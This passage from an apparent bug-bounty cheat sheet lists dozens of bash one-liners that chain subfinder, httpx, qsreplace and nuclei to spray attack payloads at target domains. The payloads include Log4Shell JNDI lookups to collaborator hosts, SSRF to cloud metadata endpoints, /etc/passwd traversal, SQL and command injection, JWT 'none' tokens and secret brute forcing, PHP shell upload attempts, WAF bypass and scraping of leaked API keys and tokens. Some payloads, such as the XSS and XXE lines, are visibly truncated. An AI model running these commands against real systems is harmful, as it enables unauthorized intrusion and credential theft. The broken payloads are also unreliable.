776 | cat all_urls.txt | sed 's/$/%00index.php/' | httpx -silent -mc 200 -o path_confusion.txt
777 | ```
778 |
779 | #### CORS Wildcard + Credentials Misconfig
780 | ```bash
781 | subfinder -d target.com | httpx -silent -path / -H 'Origin: https://evil.com' -hdrs | grep -i 'access-control-allow-origin' | grep 'evil.com' | tee weak_cors.txt
782 | ```
783 |
784 | #### Log4Shell Finder (Old but Gold)
785 | ```bash
786 | cat all_urls.txt | gf ssrf | qsreplace '${jndi:ldap://your-collaborator-url.burpcollaborator.net}' | httpx -silent
787 | ```
788 |
789 | #### Server Side Template Injection (SSTI Detection)
790 | ```bash
791 | cat all_urls.txt | gf ssti | qsreplace '{{7*7}}' | httpx -silent -fr '49' -o ssti_hits.txt
792 | ```
793 |
794 | #### Prototype Pollution Detection (Direct & Indirect)
795 | ```bash
796 | cat all_urls.txt | gf parameters | qsreplace '__proto__[exploit]=polluted' | httpx -silent -fr 'polluted' -o prototype_pollution.txt
797 | ```
798 |
799 | #### Exposed Debug Pages (Stack Traces, Debug Consoles)
800 | ```bash
801 | subfinder -d target.com | httpx -silent -path-list <(echo -e '/debug\n/_profiler\n/_debugbar\n/_error') -mc 200 -o debug_pages.txt
802 | ```
803 |
804 | #### Email Leaks in JS Files
805 | ```bash
806 | cat all_urls.txt | grep '\.js$' | xargs -I{} curl -s {} | grep -Eo "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | tee emails_found.txt
807 | ```
808 |
809 | ### Cloud Misconfig - Public S3 Buckets
810 | ```bash
811 | subfinder -d target.com | httpx -silent -path / -hdrs | grep -i 'x-amz-bucket-region' | tee public_s3.txt
812 | ```
813 |
814 | ### Exposed Admin Panels (Full Auto Discovery)
815 | ```bash
816 | subfinder -d target.com | httpx -silent -path-list <(curl -s https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/admin-panels.txt) -mc 200 -o exposed_admins.txt
817 | ```
818 |
819 | ### Mass Content Injection Check (Reflected Params)
820 | ```bash
821 | cat all_urls.txt | gf xss | qsreplace '' | httpx -silent -fr '' -o reflected_xss.txt
822 | ```
823 |
824 | ### BONUS — Ultimate ALL Misconfig Scanner (Headers, Panels, Debug, Leaks)
825 | ```bash
826 | subfinder -d target.com | httpx -silent -title -tech-detect | nuclei -silent -t misconfiguration/ -o misconfigs_found.txt
827 | ```
828 |
829 | ### API Key Leaks in JS Files
830 | ```bash
831 | cat all_js_urls.txt | xargs -I{} curl -s {} | grep -Eo 'AIza[0-9A-Za-z_-]{35}|sk_live_[0-9a-zA-Z]{24}' | tee leaked_api_keys.txt
832 | ```
833 |
834 | ### Backup Files Discovery (Think: .bak, .old, .swp)
835 | ```bash
836 | cat all_urls.txt | sed -E 's/(.*)/\1~\n\1.bak\n\1.old\n\1.swp/' | httpx -silent -mc 200 -o backup_files.txt
837 | ```
838 |
839 | ### PHP Unit RCE Finder (Real-World Gold)
840 | ```bash
841 | subfinder -d target.com | httpx -silent -path /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php -mc 200 -o phpunit_rce.txt
842 | ```
843 |
844 | ### GraphQL Misconfig Detection (Introspection Enabled)
845 | ```bash
846 | cat all_urls.txt | grep 'graphql' | xargs -I{} curl -s -X POST -d '{"query":"{__schema{types{name}}}"}' {} | grep -iq 'types' && echo "{} introspection enabled" >> graphql_misconfigs.txt
847 | ```
848 |
849 | ### Host Header Injection
850 | ```bash
851 | cat all_urls.txt | httpx -silent -H 'Host: evil.com' -hdrs | grep -i 'evil.com' | tee host_header_injection.txt
852 | ```
853 |
854 | ### Open Redirect Finder (Redirection Abuse)
855 | ```bash
856 | cat all_urls.txt | gf redirect | qsreplace 'https://evil.com' | httpx -silent -fr 'https://evil.com' -o open_redirects.txt
857 | ```
858 |
859 | ### Session Fixation Detection
860 | ```bash
861 | cat all_urls.txt | gf login | qsreplace 'sessionid=1234abcd' | httpx -silent -fr '1234abcd' -o session_fixation.txt
862 | ```
863 |
864 | ### Exposed .env Files (Sensitive Config Exposure)
865 | ```bash
866 | subfinder -d target.com | httpx -silent -path /.env -mc 200 -o exposed_env.txt
867 | ```
868 |
869 | ### SSRF Detection (Collaboration Automation)
870 | ```bash
871 | cat all_urls.txt | gf ssrf | qsreplace 'http://your-collab-url.burpcollaborator.net' | httpx -silent
872 | ```
873 |
874 | ### CRLF Injection
875 | ```bash
876 | cat all_urls.txt | gf crlf | qsreplace '%0D%0ASet-Cookie:crlf=found' | httpx -silent -fr 'crlf=found' -o crlf_injections.txt
877 | ```
878 |
879 | ### CMS Detection (for Known Exploits)
880 | ```bash
881 | subfinder -d target.com | httpx -silent -tech-detect -o cms_detected.txt
882 | ```
883 |
884 | ### Missing Security Headers (Easy Win)
885 | ```bash
886 | cat all_urls.txt | httpx -silent -H 'X-Content-Type-Options' -H 'X-Frame-Options' -H 'Content-Security-Policy' -H 'Strict-Transport-Security' | grep -E "missing|absent" | tee weak_headers.txt
887 | ```
888 |
889 | ### Cache Poisoning Detection
890 | ```bash
891 | cat all_urls.txt | gf cache | qsreplace 'X-Forwarded-Host: evil.com' | httpx -silent -fr 'evil.com' -o cache_poisoning.txt
892 | ```
893 |
894 | ### Client-Side Prototype Pollution
895 | ```bash
896 | cat all_js_urls.txt | xargs -I{} curl -s {} | grep -E 'prototype|__proto__|constructor' | tee client_side_prototype.txt
897 | ```
898 |
899 | ### Sensitive Image Exposures (Backups/Logs)
900 | ```bash
901 | subfinder -d target.com | httpx -silent -path-list <(echo -e '/backup.jpg\n/screenshot.png\n/db-dump.png\n/log.png') -mc 200 -o exposed_images.txt
902 | ```
903 |
904 | ### BONUS — Full Recon Workflow One-Liner
905 | ```bash
906 | subfinder -d target.com | httpx -silent -title -tech-detect | nuclei -silent -t vulnerabilities/ -o all_findings.txt
907 | ```
908 |
909 | ### Log4j Vulnerability Scanner (JNDI Injection)
910 | ```bash
911 | cat all_urls.txt | qsreplace '${jndi:ldap://your-collab-url.burpcollaborator.net/a}' | httpx -silent -o log4j_candidates.txt
912 | ```
913 |
914 | ### AWS S3 Bucket Takeover (Misconfigured Buckets)
915 | ```bash
916 | subfinder -d target.com | sed 's/$/.s3.amazonaws.com/' | httpx -silent -mc 200 -o open_buckets.txt
917 | ```
918 |
919 | ### JWT Secrets Brute Force (Weak Signing Key)
920 | ```bash
921 | cat jwt_tokens.txt | jwt-cracker -w wordlist.txt -t 50 -o weak_jwt_keys.txt
922 | ```
923 |
924 | ### CORS Misconfiguration Finder
925 | ```bash
926 | cat all_urls.txt | httpx -silent -H 'Origin: https://evil.com' -hdrs | grep -E "Access-Control-Allow-Origin: \*|Access-Control-Allow-Origin: https://evil.com" | tee cors_vulns.txt
927 | ```
928 |
929 | ### GCP Bucket Enumeration (Google Cloud)
930 | ```bash
931 | subfinder -d target.com | sed 's/$/.storage.googleapis.com/' | httpx -silent -mc 200 -o open_gcp_buckets.txt
932 | ```
933 |
934 | ### Python Pickle Injection Check (Deserialization Bug)
935 | ```bash
936 | cat all_urls.txt | gf deserialize | qsreplace 'evil_pickle_payload_here' | httpx -silent -o pickle_vulns.txt
937 | ```
938 |
939 | ### SQL Injection (Error-Based Detection)
940 | ```bash
941 | cat all_urls.txt | gf sqli | qsreplace "' OR 1=1 --" | httpx -silent -fr 'syntax|sql|error|database' -o sql_injection.txt
942 | ```
943 |
944 | ### Version Disclosure Detection
945 | ```bash
946 | cat all_urls.txt | httpx -silent -hdrs | grep -Ei 'server:|x-powered-by:' | tee version_disclosures.txt
947 | ```
948 |
949 | ### CRLF Injection with Cookie Injection Check
950 | ```bash
951 | cat all_urls.txt | gf crlf | qsreplace '%0d%0aSet-Cookie:+crlf=found' | httpx -silent -fr 'crlf=found' -o crlf_cookie_injection.txt
952 | ```
953 |
954 | ### Directory Traversal Finder
955 | ```bash
956 | cat all_urls.txt | qsreplace '../../etc/passwd' | httpx -silent -fr 'root:x' -o dir_traversal.txt
957 | ```
958 |
959 | ### Azure Storage Enumeration
960 | ```bash
961 | subfinder -d target.com | sed 's/$/.blob.core.windows.net/' | httpx -silent -mc 200 -o open_azure_blobs.txt
962 | ```
963 |
964 | ### Subdomain Takeover Detection (CNAME Pointing to Unclaimed Services)
965 | ```bash
966 | subfinder -d target.com | dnsx -silent -a -resp-only | nuclei -silent -t takeover-detection/ -o takeover_candidates.txt
967 | ```
968 |
969 | ### Unauthorized Admin Panel Access
970 | ```bash
971 | cat all_urls.txt | httpx -silent -path-list <(echo -e '/admin\n/dashboard\n/cms\n/panel\n/root\n/console') -mc 200 -o exposed_admins.txt
972 | ```
973 |
974 | ### IPv6 Asset Discovery (Many Orgs Forget This)
975 | ```bash
976 | subfinder -d target.com | dnsx -silent -aaaa -resp-only | tee ipv6_assets.txt
977 | ```
978 |
979 | ### Template Injection Finder (SSTI)
980 | ```bash
981 | cat all_urls.txt | gf ssti | qsreplace '{{7*7}}' | httpx -silent -fr '49' -o ssti_vulns.txt
982 | ```
983 |
984 | ### Open Redirect Detection
985 | ```bash
986 | cat all_urls.txt | gf redirect | qsreplace 'https://evil.com' | httpx -silent -fr 'Location: https://evil.com' -o open_redirects.txt
987 | ```
988 |
989 | ### Server-Side Request Forgery (SSRF)
990 | ```bash
991 | cat all_urls.txt | gf ssrf | qsreplace 'http://your-burpcollab-url.burpcollaborator.net' | httpx -silent -o ssrf_candidates.txt
992 | ```
993 |
994 | ### Exposed .git Repositories (Code Leakage)
995 | ```bash
996 | cat subdomains.txt | httpx -silent -path '/.git/config' -mc 200 -o exposed_git_repos.txt
997 | ```
998 |
999 | ### Command Injection Finder
1000 | ```bash
1001 | cat all_urls.txt | gf cmd-injection | qsreplace '&& id' | httpx -silent -fr 'uid=' -o cmd_injection.txt
1002 | ```
1003 |
1004 | ### Prototype Pollution Detection
1005 | ```bash
1006 | cat all_urls.txt | qsreplace '__proto__[exploit]=polluted' | httpx -silent -fr 'polluted' -o prototype_pollution.txt
1007 | ```
1008 |
1009 | ### Email/PII Leakage in Responses
1010 | ```bash
1011 | cat all_urls.txt | httpx -silent -fr '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}' -o leaked_emails.txt
1012 | ```
1013 |
1014 | ### Host Header Injection
1015 | ```bash
1016 | cat all_urls.txt | httpx -silent -H 'Host: attacker.com' -fr 'attacker.com' -o host_header_injection.txt
1017 | ```
1018 |
1019 | ### Path Traversal (Windows)
1020 | ```bash
1021 | cat all_urls.txt | qsreplace 'C:/Windows/win.ini' | httpx -silent -fr 'for 16-bit app support' -o windows_traversal.txt
1022 | ```
1023 |
1024 | ### Sensitive Files (Backup Files Exposure)
1025 | ```bash
1026 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/.env\n/config.php.bak\n/database.yml\n/backup.zip') -mc 200 -o sensitive_files.txt
1027 | ```
1028 |
1029 | ### Exposed Config Panels (CMS, Jenkins, PhpMyAdmin)
1030 | ```bash
1031 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/phpmyadmin\n/jenkins\n/wp-admin\n/admin\n/cpanel') -mc 200 -o exposed_panels.txt
1032 | ```
1033 |
1034 | ### Hardcoded API Keys in JS Files
1035 | ```bash
1036 | cat all_js_urls.txt | xargs -I{} curl -s {} | grep -E 'apiKey|apikey|secret|token|bearer' | tee hardcoded_api_keys.txt
1037 | ```
1038 |
1039 | ### Spring Boot Actuator Exposed Endpoints
1040 | ```bash
1041 | cat subdomains.txt | httpx -silent -path '/actuator/health' -mc 200 -o exposed_actuators.txt
1042 | ```
1043 |
1044 | ### Gopher SSRF (Redis/SMTP Attack)
1045 | ```bash
1046 | cat all_urls.txt | qsreplace 'gopher://127.0.0.1:6379/_COMMAND' | httpx -silent -o gopher_ssrf_candidates.txt
1047 | ```
1048 |
1049 | ### HTML Injection (Reflected)
1050 | ```bash
1051 | cat all_urls.txt | gf xss | qsreplace 'PWNED
' | httpx -silent -fr 'PWNED
' -o html_injection.txt
1052 | ```
1053 |
1054 | ### API Token Misconfiguration (Bearer Token Disclosure)
1055 | ```bash
1056 | cat all_urls.txt | httpx -silent -hdrs | grep -i 'authorization: Bearer' | tee bearer_tokens.txt
1057 | ```
1058 |
1059 | ### WordPress Plugin Vulnerabilities (Outdated Plugins)
1060 | ```bash
1061 | nuclei -l subdomains.txt -t cves/wordpress/ -o wp_vulns.txt
1062 | ```
1063 |
1064 | ### Broken Link Hijacking (Subdomain Takeover via Broken Links)
1065 | ```bash
1066 | cat subdomains.txt | gau | grep -E '\.(js|css|png|jpg|jpeg|gif|svg|woff|ttf|ico)' | httpx -silent -status-code -o broken_links.txt
1067 | ```
1068 |
1069 | ### CRLF Injection (HTTP Response Splitting)
1070 | ```bash
1071 | cat all_urls.txt | qsreplace '%0d%0aSet-Cookie:crlftest=crlfpoc' | httpx -silent -fr 'crlftest=crlfpoc' -o crlf_injection.txt
1072 | ```
1073 |
1074 | ### Cloud Storage Misconfig (AWS S3 Bucket Public Access)
1075 | ```bash
1076 | cat subdomains.txt | nuclei -t misconfiguration/ -o s3_buckets.txt
1077 | ```
1078 |
1079 | ### HTTP Method Fuzzing (Check PUT/DELETE enabled)
1080 | ```bash
1081 | cat subdomains.txt | httpx -silent -methods PUT,DELETE -mc 200 -o risky_methods.txt
1082 | ```
1083 |
1084 | ### GraphQL Misconfig (Introspection Enabled)
1085 | ```bash
1086 | cat subdomains.txt | httpx -silent -path '/graphql' -mc 200 -fr 'Introspection Query' -o graphql_introspection.txt
1087 | ```
1088 |
1089 | ### DNS Zone Transfer (AXFR Check)
1090 | ```bash
1091 | for domain in $(cat subdomains.txt); do dig axfr $domain @ns1.$domain; done
1092 | ```
1093 |
1094 | ### CSP Bypass/Weak CSP Check
1095 | ```bash
1096 | cat subdomains.txt | nuclei -t security-misconfiguration/csp-missing.yaml -o weak_csp.txt
1097 | ```
1098 |
1099 | ### Backup Files (Git, SQL Dumps, Zip Archives)
1100 | ```bash
1101 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/backup.sql\n/.git/config\n/backup.zip') -mc 200 -o backup_leaks.txt
1102 | ```
1103 |
1104 | ### Session Fixation (Check if sessionID can be set)
1105 | ```bash
1106 | cat all_urls.txt | qsreplace 'sessionid=abc123' | httpx -silent -fr 'sessionid=abc123' -o session_fixation.txt
1107 | ```
1108 |
1109 | ### JWT Secret Bruteforce (Weak Signing Keys)
1110 | ```bash
1111 | cat subdomains.txt | jwt_tool -I -bruteforce wordlist.txt -o weak_jwt_keys.txt
1112 | ```
1113 |
1114 | ### Exposed Email Addresses in Webpages
1115 | ```bash
1116 | cat all_urls.txt | httpx -silent -fr '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}' -o leaked_emails.txt
1117 | ```
1118 |
1119 |
1120 | ### XML External Entity Injection (XXE)
1121 | ```bash
1122 | cat all_urls.txt | gf xxe | qsreplace ']>&xxe;' | httpx -silent -fr 'root:x' -o xxe_poc.txt
1123 | ```
1124 |
1125 | ### Exposed Directory Listings (Misconfig)
1126 | ```bash
1127 | cat subdomains.txt | httpx -silent -path '/' -fr 'Index of' -o open_dirs.txt
1128 | ```
1129 |
1130 | ### Kubernetes Dashboard Exposure
1131 | ```bash
1132 | cat subdomains.txt | httpx -silent -path '/api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/' -mc 200 -o exposed_k8s_dashboard.txt
1133 | ```
1134 |
1135 | ### Exposed Swagger API (Public API Docs)
1136 | ```bash
1137 | cat subdomains.txt | httpx -silent -path '/swagger-ui.html' -mc 200 -o exposed_swagger.txt
1138 | ```
1139 |
1140 | ### Open Redirect Detection
1141 | ```bash
1142 | cat all_urls.txt | gf redirect | qsreplace 'https://evil.com' | httpx -silent -fr 'evil.com' -o open_redirects.txt
1143 | ```
1144 |
1145 | ### Directory Traversal (../ Exploit)
1146 | ```bash
1147 | cat all_urls.txt | gf lfi | qsreplace '../etc/passwd' | httpx -silent -fr 'root:x' -o directory_traversal.txt
1148 | ```
1149 |
1150 | ### Server-Side Template Injection (SSTI)
1151 | ```bash
1152 | cat all_urls.txt | gf ssti | qsreplace '{{7*7}}' | httpx -silent -fr '49' -o ssti_found.txt
1153 | ```
1154 |
1155 | ### Insecure Cross-Origin Resource Sharing (CORS)
1156 | ```bash
1157 | cat subdomains.txt | httpx -silent -H "Origin: https://evil.com" -fr 'https://evil.com' -o weak_cors.txt
1158 | ```
1159 |
1160 | ### SQL Injection - Quick Payload Fire
1161 | ```bash
1162 | cat all_urls.txt | gf sqli | qsreplace "' OR '1'='1" | httpx -silent -fr 'error' -o sqli_poc.txt
1163 | ```
1164 |
1165 | ### Backup Config Files (env/config.php)
1166 | ```bash
1167 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/.env\n/config.php\n/settings.py\n/config.json') -mc 200 -o leaked_configs.txt
1168 | ```
1169 |
1170 | ### SSRF (Server-Side Request Forgery)
1171 | ```bash
1172 | cat all_urls.txt | gf ssrf | qsreplace 'http://burpcollaborator.net' | httpx -silent -o ssrf_candidates.txt
1173 | ```
1174 |
1175 | ### File Upload (Potential Upload Endpoints)
1176 | ```bash
1177 | cat all_urls.txt | gf upload | httpx -silent -mc 200 -o upload_endpoints.txt
1178 | ```
1179 |
1180 | ### Sensitive Data Exposure (Credit Card, API Keys)
1181 | ```bash
1182 | cat all_urls.txt | httpx -silent -fr 'sk_live|pk_live|eyJhbGci|-----BEGIN PRIVATE KEY-----|4[0-9]{12}(?:[0-9]{3})?' -o sensitive_data.txt
1183 | ```
1184 |
1185 | ### JWT Token Leak (in URL or Response)
1186 | ```bash
1187 | cat all_urls.txt | httpx -silent -fr 'eyJ' -o jwt_leaks.txt
1188 | ```
1189 |
1190 | ### Exposed Database Panels (phpMyAdmin, Mongo, etc)
1191 | ```bash
1192 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/phpmyadmin/\n/admin/\n/mongo-express/') -mc 200 -o exposed_db_panels.txt
1193 | ```
1194 |
1195 | ### GIT Repo Exposure
1196 | ```bash
1197 | cat subdomains.txt | httpx -silent -path '/.git/config' -mc 200 -o exposed_git.txt
1198 | ```
1199 |
1200 | ### Debug Pages (dev.php/test.php)
1201 | ```bash
1202 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/test.php\n/dev.php\n/debug.php') -mc 200 -o debug_pages.txt
1203 | ```
1204 |
1205 | ### Exposed API Keys in JavaScript Files
1206 | ```bash
1207 | cat subdomains.txt | gau | grep '\.js$' | httpx -silent -fr 'AIza|sk_live|ghp_' -o api_key_leaks.txt
1208 | ```
1209 |
1210 | ### Unsafe File Upload (PHP Reverse Shell Upload)
1211 | ```bash
1212 | cat upload_endpoints.txt | qsreplace 'file=shell.php' | httpx -silent -mc 200 -o shell_upload.txt
1213 | ```
1214 |
1215 | ### Clickjacking (Missing X-Frame-Options)
1216 | ```bash
1217 | cat subdomains.txt | httpx -silent -header 'X-Frame-Options' -o missing_xfo.txt
1218 | ```
1219 |
1220 | ### HTTP Parameter Pollution (Duplicate Params)
1221 | ```bash
1222 | cat all_urls.txt | qsreplace 'param1=value1¶m1=value2' | httpx -silent -mc 200 -o hpp_candidates.txt
1223 | ```
1224 |
1225 | ### Server Info Disclosure (Version Leaks)
1226 | ```bash
1227 | cat subdomains.txt | httpx -silent -sc -title -o server_versions.txt
1228 | ```
1229 |
1230 | ### Password Reset Token Leak in URL
1231 | ```bash
1232 | cat all_urls.txt | grep -i 'reset' | grep -E 'token=|key=' | httpx -silent -o reset_token_leak.txt
1233 | ```
1234 |
1235 | ### Host Header Injection
1236 | ```bash
1237 | cat subdomains.txt | httpx -silent -H "Host: attacker.com" -fr "attacker.com" -o host_header_injection.txt
1238 | ```
1239 |
1240 | ### Web Cache Poisoning
1241 | ```bash
1242 | cat all_urls.txt | qsreplace 'X-Original-URL: /evil' | httpx -silent -fr 'evil' -o cache_poisoning.txt
1243 | ```
1244 |
1245 | ### AWS Bucket Takeover (S3)
1246 | ```bash
1247 | cat subdomains.txt | awk -F. '{print $1"."$2}' | while read domain; do aws s3 ls s3://$domain --no-sign-request; done
1248 | ```
1249 |
1250 | ### Exposed Secret Tokens in Robots.txt
1251 | ```bash
1252 | cat subdomains.txt | httpx -silent -path /robots.txt -fr 'token|key|secret' -o secret_leak_robots.txt
1253 | ```
1254 |
1255 | ### Email Injection in Contact Forms
1256 | ```bash
1257 | cat contact_forms_urls.txt | qsreplace 'email=attacker%0A%0DCC%3Aevil@attacker.com' | httpx -silent -mc 200 -o email_injection.txt
1258 | ```
1259 |
1260 | ### PHP Info Disclosure (info.php)
1261 | ```bash
1262 | cat subdomains.txt | httpx -silent -path /info.php -mc 200 -o phpinfo_exposed.txt
1263 | ```
1264 |
1265 | ### Debug Endpoints Exposure (Spring Boot Actuator)
1266 | ```bash
1267 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/actuator/health\n/actuator/env\n/actuator/mappings') -mc 200 -o exposed_actuator.txt
1268 | ```
1269 |
1270 | ### Directory Listing Enabled
1271 | ```bash
1272 | cat subdomains.txt | httpx -silent -path '/' -fr 'Index of' -o directory_listing.txt
1273 | ```
1274 |
1275 | ### Kubernetes Dashboard Exposure
1276 | ```bash
1277 | cat subdomains.txt | httpx -silent -path '/#/login' -mc 200 -o kube_dashboard_exposed.txt
1278 | ```
1279 |
1280 | ### Log File Exposure (access.log, error.log)
1281 | ```bash
1282 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/access.log\n/error.log') -mc 200 -o exposed_logs.txt
1283 | ```
1284 |
1285 | ### Backup Files in Root (zip, tar, sql)
1286 | ```bash
1287 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/backup.zip\n/db.sql\n/site.tar.gz') -mc 200 -o backup_files.txt
1288 | ```
1289 |
1290 | ### Insecure Direct Object Reference (IDOR)
1291 | ```bash
1292 | cat idor_urls.txt | qsreplace 'user_id=123' | httpx -silent -mc 200 -o idor_candidates.txt
1293 | ```
1294 |
1295 | ### CSP Bypass (Missing or Weak CSP)
1296 | ```bash
1297 | cat subdomains.txt | httpx -silent -H 'Content-Security-Policy' -o weak_csp.txt
1298 | ```
1299 |
1300 | ### Open API Endpoints Discovery
1301 | ```bash
1302 | cat subdomains.txt | httpx -silent -path /swagger.json -mc 200 -o swagger_exposed.txt
1303 | ```
1304 |
1305 | ### OAuth Token Leak in URLs
1306 | ```bash
1307 | cat all_urls.txt | grep -i 'access_token=' -o oauth_token_leaks.txt
1308 | ```
1309 |
1310 | ### GraphQL Endpoint Discovery
1311 | ```bash
1312 | cat subdomains.txt | httpx -silent -path /graphql -mc 200 -o graphql_found.txt
1313 | ```
1314 |
1315 | ### Prototype Pollution via Params
1316 | ```bash
1317 | cat all_urls.txt | qsreplace '__proto__[test]=polluted' | httpx -silent -fr 'polluted' -o prototype_pollution.txt
1318 | ```
1319 |
1320 | ### WordPress XML-RPC Abuse
1321 | ```bash
1322 | cat subdomains.txt | httpx -silent -path /xmlrpc.php -mc 200 -o xmlrpc_found.txt
1323 | ```
1324 |
1325 | 🔐 JWT None Algorithm Bypass Check
1326 | ```bash
1327 | cat all_urls.txt | qsreplace 'token=eyJhbGciOiJub25lIn0.eyJ1c2VyIjoiYWRtaW4ifQ.' | httpx -silent -mc 200 -o jwt_none_bypass.txt
1328 | ```
1329 |
1330 | 🚀 Session Fixation via Set-Cookie
1331 | ```bash
1332 | cat subdomains.txt | httpx -silent -H "Cookie: sessionid=attacker-session" -o session_fixation.txt
1333 | ```
1334 |
1335 | 🛜 Open Redirects
1336 | ```bash
1337 | cat urls.txt | qsreplace 'https://evil.com' | httpx -silent -fr 'evil.com' -o open_redirects.txt
1338 | ```
1339 |
1340 | 🗂️ Exposed .git Folder
1341 | ```bash
1342 | cat subdomains.txt | httpx -silent -path /.git/HEAD -mc 200 -o git_exposed.txt
1343 | ```
1344 |
1345 | 🌍 Exposed .env Files (Secrets Leak)
1346 | ```bash
1347 | cat subdomains.txt | httpx -silent -path /.env -mc 200 -o env_leaks.txt
1348 | ```
1349 |
1350 | 🧬 GraphQL Introspection Enabled
1351 | ```bash
1352 | cat subdomains.txt | httpx -silent -path /graphql -x POST -body '{"query":"query IntrospectionQuery { __schema { types { name } } }"}' -fr 'data' -o graphql_introspection.txt
1353 | ```
1354 |
1355 | Insecure CORS (Wildcard or Null)
1356 | ```bash
1357 | cat subdomains.txt | httpx -silent -H "Origin: https://evil.com" -fr "https://evil.com" -o insecure_cors.txt
1358 | ```
1359 |
1360 | 📂 Backup Files Discovery (.zip, .sql, etc)
1361 | ```bash
1362 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/backup.zip\n/db.sql\n/site_backup.tar.gz') -mc 200 -o backup_files.txt
1363 | ```
1364 |
1365 | 📊 Admin Panels Discovery
1366 | ```bash
1367 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/admin\n/dashboard\n/panel\n/cp') -mc 200 -o admin_panels.txt
1368 | ```
1369 |
1370 | 💀 Server Side Template Injection (SSTI)
1371 | ```bash
1372 | cat all_urls.txt | qsreplace '{{7*7}}' | httpx -silent -fr '49' -o ssti.txt
1373 | ```
1374 |
1375 | 📋 Path Traversal (../ Disclosure)
1376 | ```bash
1377 | cat all_urls.txt | qsreplace '../../../../etc/passwd' | httpx -silent -fr 'root:x' -o path_traversal.txt
1378 | ```
1379 |
1380 | 🐍 Python Pickle Injection (if Flask or Python backend)
1381 | ```bash
1382 | cat all_urls.txt | qsreplace '__class__=os.system&cmd=id' | httpx -silent -fr 'uid=' -o pickle_injection.txt
1383 | ```
1384 |
1385 | CRLF Injection (Header Splitting)
1386 | ```bash
1387 | cat all_urls.txt | qsreplace '%0d%0aHeader: evil' | httpx -silent -fr 'Header: evil' -o crlf.txt
1388 | ```
1389 |
1390 | 💾 Exposed Database Admin Panels
1391 | ```bash
1392 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/phpmyadmin\n/adminer\n/sql') -mc 200 -o db_admin_panels.txt
1393 | ```
1394 |
1395 | 🧱 File Upload Misconfig (Can upload PHP/JSP)
1396 | ```bash
1397 | cat upload_endpoints.txt | xargs -I {} curl -X POST -F 'file=@payload.php' {} -s -o - | grep 'shell_exec' -B 2
1398 | ```
1399 |
1400 | 🕵️♂️ Cloud Metadata API Exposure (AWS/GCP)
1401 | ```bash
1402 | cat subdomains.txt | httpx -silent -path /latest/meta-data/ -mc 200 -o metadata_exposed.txt
1403 | ```
1404 |
1405 | 💣 CRLF in Redirect Location Header
1406 | ```bash
1407 | cat urls.txt | qsreplace '%0d%0aLocation:%20https://evil.com' | httpx -silent -fr 'evil.com' -o crlf_redirect.txt
1408 | ```
1409 |
1410 | 📑 XSS in JSON Response (Reflected)
1411 | ```bash
1412 | cat urls.txt | qsreplace '">' | httpx -silent -fr 'alert(1)' -o xss.json.txt
1413 | ```
1414 |
1415 | 🔌 Exposed Internal IPs (Debug Responses)
1416 | ```bash
1417 | cat urls.txt | httpx -silent -fr '10\.|172\.|192\.168\.' -o internal_ips.txt
1418 | ```
1419 |
1420 | 🌐 Misconfigured WAF Bypass
1421 | ```bash
1422 | cat urls.txt | qsreplace '>' | httpx -silent -mc 403 -o waf_detected.txt
1423 | cat waf_detected.txt | qsreplace '>' | anew bypass_payloads.txt
1424 | cat bypass_payloads.txt | httpx -silent -mc 200 -o waf_bypass.txt
1425 | ```
1426 |
1427 | 📤 Information Disclosure via Verb Tampering
1428 | ```bash
1429 | cat subdomains.txt | httpx -silent -method OPTIONS -o verb_tampering.txt
1430 | ```
1431 |
1432 | 🧰 **S3 Bucket Discovery via Subdomain Bruteforce**
1433 | ```bash
1434 | cat subdomains.txt | awk -F. '{print $1"."$2}' | xargs -I {} aws s3 ls s3://{} --no-sign-request 2>/dev/null | tee s3_buckets.txt
1435 | ```
1436 |
1437 | 💧 **AWS S3 Bucket Takeover (Subdomain Takeover)**
1438 | ```bash
1439 | cat subdomains.txt | xargs -I {} host {} | grep 'amazonaws.com' | awk '{print $1}' | httpx -silent -mc 404 -o vulnerable_s3.txt
1440 | ```
1441 |
1442 | 📜 **Exposed Swagger/OpenAPI Endpoints**
1443 | ```bash
1444 | cat subdomains.txt | httpx -silent -path-list <(echo -e '/swagger.json\n/openapi.json\n/api-docs') -mc 200 -o openapi_endpoints.txt
1445 | ```
1446 |
1447 | **Prototype Pollution in Query Params**
1448 | ```bash
1449 | cat urls.txt | qsreplace '__proto__[evil]=polluted' | httpx -silent -fr 'polluted' -o prototype_pollution.txt
1450 | ```
1451 |
1452 | 💉 **SQL Injection (Basic Reflex Check)**
1453 | ```bash
1454 | cat urls.txt | qsreplace "'" | httpx -silent -fr 'SQL syntax' -o sqli.txt
1455 | ```
1456 |
1457 | 🔗 **SSRF (Internal IP Scan via Open Redirect or URL Input)**
1458 | ```bash
1459 | cat urls.txt | qsreplace 'http://169.254.169.254/latest/meta-data/' | httpx -silent -fr 'ami-id' -o ssrf_aws_metadata.txt
1460 | ```
1461 |
1462 | 🔥 **Spring Boot Actuator Exposure (DevOps Misconfig)**
1463 | ```bash
1464 | cat subdomains.txt | httpx -silent -path /actuator/env -mc 200 -o springboot_actuator_exposed.txt
1465 | ```
1466 |
1467 | **JWT None Algorithm Bypass**
1468 | ```bash
1469 | cat urls.txt | qsreplace 'eyJhbGciOiJub25lIn0.eyJ1c2VyIjoiYWRtaW4ifQ.' | httpx -silent -fr 'admin' -o jwt_none_bypass.txt
1470 | ```
1471 |
1472 | **Firebase Misconfig (Open Firebase Databases)**
1473 | ```bash
1474 | cat subdomains.txt | sed 's/$/.firebaseio.com/' | httpx -silent -path /.json -mc 200 -o open_firebase.txt
1475 | ```
1476 |
1477 | 📡 **GraphQL Playground/Console Discovery**
1478 | ```bash
